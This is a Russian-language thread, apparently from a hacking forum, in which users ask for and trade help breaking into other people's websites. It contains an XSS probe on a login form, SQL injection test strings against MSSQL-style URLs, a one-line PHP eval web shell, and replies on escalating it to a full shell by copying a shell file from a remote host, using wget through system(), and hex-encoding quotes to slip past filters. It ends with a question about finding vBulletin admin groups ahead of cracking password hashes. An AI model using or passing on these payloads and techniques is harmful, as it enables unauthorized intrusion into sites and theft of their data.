поиск - классная штука. Code: http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest первая ссылка Code: /threadnav30632.html и ещё куча тем и тому подобного.
Зашел на один портал, решил проверить логин на xss, при вставке <script>alert('12');</script> в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает - Server Error in '/' Application. Code: <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine. <br><br> <b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".<br><br> можно как-то использовать в своих целях?
Здравствуйте. Помигите пожалуйста. Допустим сайт вида http://sait.com/tut-tekst/i-tut.html возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
Такая проблема: залил файл с таким содержанием <?php @eval($_GET[cmd]); ?>. phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
во-первых, http://php.net/manual/ru/function.file-put-contents.php во-вторых, magic quotes учитывай а шелл так льется, например: 1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
ну мог бы по аналогии fileputcontens заюзать 1=<?php shell>&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]); также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
file_put_contents - пробовал, безрезультатно. Так я лью через скулю, файл с таким кодом я хотел залить <?php if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); ?> Но увы )); почему-то не приняло. Может в бейс закодить?
Слабо знаком с SQL-иньекциями в MSSQL. http://www.site.com/internal.asp?ProdID=124335' http://www.site.com/internal.asp?ProdID=124335-- Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно? http://www.site.com/internal.asp?ProdID=124335+AND+1=1-- http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version-- Что я делаю не так?
Читал, и не только там. В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)
проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай. Кавычки убери или закодь, но не в бейс, а в хекс.
есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку